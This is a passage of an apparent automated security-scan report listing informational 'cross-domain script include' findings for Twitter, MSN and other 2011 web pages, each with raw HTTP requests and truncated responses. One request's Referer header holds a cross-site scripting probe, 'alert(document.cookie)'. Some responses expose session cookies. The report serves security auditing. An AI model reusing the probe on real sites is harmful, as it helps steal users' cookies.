...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/twitter.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268125" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268125" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/geov1.js?1296268125" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296265969/javascripts/api.js?1296268125" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268125" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/dismissable.js?1296268125" type="text/javascript"></script>
...[SNIP]...

23.398. http://twitter.com/wjrothman

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /wjrothman

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wjrothman HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:02:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356563-11223-39959
ETag: "067321df962e685b47091af05f4b9fbc"
Last-Modified: Sun, 30 Jan 2011 03:02:43 GMT
X-Runtime: 0.01619
Content-Type: text/html; charset=utf-8
Content-Length: 49641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356563232205; path=/; expires=Sun, 06-Feb-11 03:02:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635656362644604; path=/; expires=Tue, 01 Mar 2011 03:02:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTVjMmFiMWM4ZTg4ZjRhNmE2N2QyZTlhMzYyMDlkNTNlIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIrFrf1C0B--3aa7bb9fe9c6795ddbbf9680544888cbf7541ea2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296265969/javascripts/twitter.js?1296268742" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268742" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268742" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296265969/javascripts/geov1.js?1296268742" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296265969/javascripts/api.js?1296268742" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296265969/javascripts/dismissable.js?1296268742" type="text/javascript"></script>
...[SNIP]...

23.399. https://twitter.com/ToddKenreck

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /ToddKenreck

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 03:03:01 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296356581-64489-22662
ETag: "64fd45f3d163ffe5f3eb5309c6bbafbb"
Last-Modified: Sun, 30 Jan 2011 03:03:01 GMT
X-Runtime: 0.01332
Content-Type: text/html; charset=utf-8
Content-Length: 38284
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296356581648173; path=/; expires=Sun, 06-Feb-11 03:03:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129635658185310608; path=/; expires=Tue, 01 Mar 2011 03:03:01 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCN%252Bh39QtAToHaWQiJTZkNWFlYzNiNjc5OTZk%250AN2JjM2EyOTg3YzdkNWU2Y2U5IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--0004367452c498e4750ca5a1e95bbdef70cffad9; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296269366" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296269366" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/geov1.js?1296269366" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/api.js?1296269366" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296269366" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/dismissable.js?1296269366" type="text/javascript"></script>
...[SNIP]...

23.400. https://twitter.com/ToddKenreck

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /ToddKenreck

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ToddKenreck HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 30 Jan 2011 18:55:43 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296413743-28266-39449
ETag: "2c6078d5ad02084503ac67174803e3a9"
Last-Modified: Sun, 30 Jan 2011 18:55:43 GMT
X-Runtime: 0.01044
Content-Type: text/html; charset=utf-8
Content-Length: 38284
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296413743074695; path=/; expires=Sun, 06-Feb-11 18:55:43 GMT; domain=.twitter.com
Set-Cookie: guest_id=129641374308413366; path=/; expires=Tue, 01 Mar 2011 18:55:43 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWM0MzhkN2MzMGYwZWQ3NzcwYTZjM2RkMjRlNGM5N2M1Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsI7tdH2C0B--f823c1315fc2ef2e3037c3ef689294b1c46c8564; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="https://si3.twimg.com/a/1296265969/javascripts/twitter-https.js" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/jquery.tipsy.min.js?1296268742" type="text/javascript"></script>
<script type='text/javascript' src='https://www.google.com/jsapi'></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/lib/gears_init.js?1296268742" type="text/javascript"></script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296265969/javascripts/geov1.js?1296268742" type="text/javascript"></script>
<script src="https://si0.twimg.com/a/1296265969/javascripts/api.js?1296268742" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="https://si1.twimg.com/a/1296265969/javascripts/lib/mustache.js?1296268742" type="text/javascript"></script>
<script src="https://si2.twimg.com/a/1296265969/javascripts/dismissable.js?1296268742" type="text/javascript"></script>
...[SNIP]...

23.401. http://video.fr.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.fr.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: video.fr.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Machine: CH1********909
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.422 secs
X-Powered-By: ASP.NET
Content-Length: 170387
Age: 23
Date: Sun, 30 Jan 2011 01:51:33 GMT
Expires: Sun, 30 Jan 2011 02:06:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//FR" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Toutes&#32;les&#32;vid&#233;os&#32;
...[SNIP]...
</script><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;MsnPost.js"></script>
...[SNIP]...

23.402. http://video.uk.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://video.uk.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: video.uk.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=900
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Machine: CH1********302
X-AspNet-Version: 2.0.50727
X-RenderTime: 0.406 secs
X-Powered-By: ASP.NET
Content-Length: 114886
Age: 27
Date: Sun, 30 Jan 2011 01:51:39 GMT
Expires: Sun, 30 Jan 2011 02:06:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Watch&#32;free&#32;full&#32;TV&#32;
...[SNIP]...
</script><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;MsnPost.js"></script>
...[SNIP]...

23.403. http://redcated/CNT/iview/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7201
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:29:43 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script>
...[SNIP]...

23.404. http://redcated/CNT/iview/287065754/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6730
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:30:51 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCIN14201CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=287065754&advid=607929&sid=287065754&adid="></script>
...[SNIP]...

23.405. http://redcated/NYC/iview/264935949/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6554
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 13:00:29 GMT

<html>
<head>
<title>BND_Coffee2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-wi
...[SNIP]...
</noscript>
<script src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=166700&siteID=264935949&creativeID=197994882"></script>
...[SNIP]...

23.406. http://visitmix.com/Labs/rosetta/eyesofblend/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://visitmix.com
Path:   /Labs/rosetta/eyesofblend/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Labs/rosetta/eyesofblend/ HTTP/1.1
Host: visitmix.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 1.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:27:07 GMT
Connection: close
Content-Length: 11900


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><title>
   
...[SNIP]...
</script>

<script type="text/javascript" charset="utf-8" src="http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...

23.407. http://wbenedetti.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wbenedetti.newsvine.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: wbenedetti.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:05:09 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=37e0e82eb5225aaf39e58b2c59ea3714; expires=Sat, 25-Jan-2031 03:05:09 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 80810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.408. http://webreflection.blogspot.com/2007/08/global-scope-evaluation-and-dom.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webreflection.blogspot.com
Path:   /2007/08/global-scope-evaluation-and-dom.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2007/08/global-scope-evaluation-and-dom.html HTTP/1.1
Host: webreflection.blogspot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Expires: Sun, 30 Jan 2011 01:51:56 GMT
Date: Sun, 30 Jan 2011 01:51:56 GMT
Last-Modified: Sat, 29 Jan 2011 16:51:37 GMT
ETag: "68641a2f-a995-496b-a3b0-3a35d5667c34"
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=0, proxy-revalidate, must-revalidate
Age: 0
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>W
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://feeds.feedburner.com/WebReflection" />

<script type="text/javascript" src="http://www.3site.eu/JSL/JSL.php"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/bigdollar.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/JSHighLighter.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/blog.js"></script>
<script type="text/javascript" src="http://www.3site.eu/devpro/GoogleTranslator.js"></script>

<script type="text/javascript" src="http://www.3site.eu/JPU/JPU.js"><!--// JPU - by WebReflection //--></script>
<script type="text/javascript" src="http://www.3site.eu/javascript/GuruMeditation.js"><!--// (C) Andrea Giammarchi //--></script>
<script type="text/javascript" src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.3site.eu/examples/jSmile.js"><!--// JSmile - by WebReflection //-->
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.blogger.com/dyn-css/authorization.css?targetBlogID=34454975&zx=68641a2f-a995-496b-a3b0-3a35d5667c34"/><script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/979395223-backlink.js"></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/v-js/1895108979-backlink_control.js"></script>
...[SNIP]...
<dl id="comments-block">
<script type="text/javascript" src="http://www.blogger.com/dyn-js/backlink.js?blogID=34454975&postID=5218588853177230823" charset="utf-8" defer="true">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>


</div>


<script type="text/javascript" src="http://www.ubuntu.com/files/countdown/display2.js"></script>
...[SNIP]...
</ul>


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"><!--// Google Analytics //-->
...[SNIP]...
</script>
<script src="http://badge.facebook.com/badge/1070526700.33.897046733.js"></script>
...[SNIP]...
<!-- End #footer -->
<script type="text/javascript" src="http://embed.technorati.com/embed/bzftjmf2gh.js"><!--// andr3a @ Technorati //--></script>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/755007736-csitail.js"></script>
...[SNIP]...

23.409. http://wonderwall.redacted/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:44 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: MISS from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.410. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /movies/celeb-inc-for-jan-28-11106.gallery

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /movies/celeb-inc-for-jan-28-11106.gallery HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:44 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.411. http://wonderwall.redacted/music/chris-brown-completes-domestic-violence-program-1594072.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /music/chris-brown-completes-domestic-violence-program-1594072.story

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /music/chris-brown-completes-domestic-violence-program-1594072.story HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:58 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

23.412. http://wonderwall.redacted/tv/jaime-pressly-files-for-divorce-1594033.story

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /tv/jaime-pressly-files-for-divorce-1594033.story

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /tv/jaime-pressly-files-for-divorce-1594033.story HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:53 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
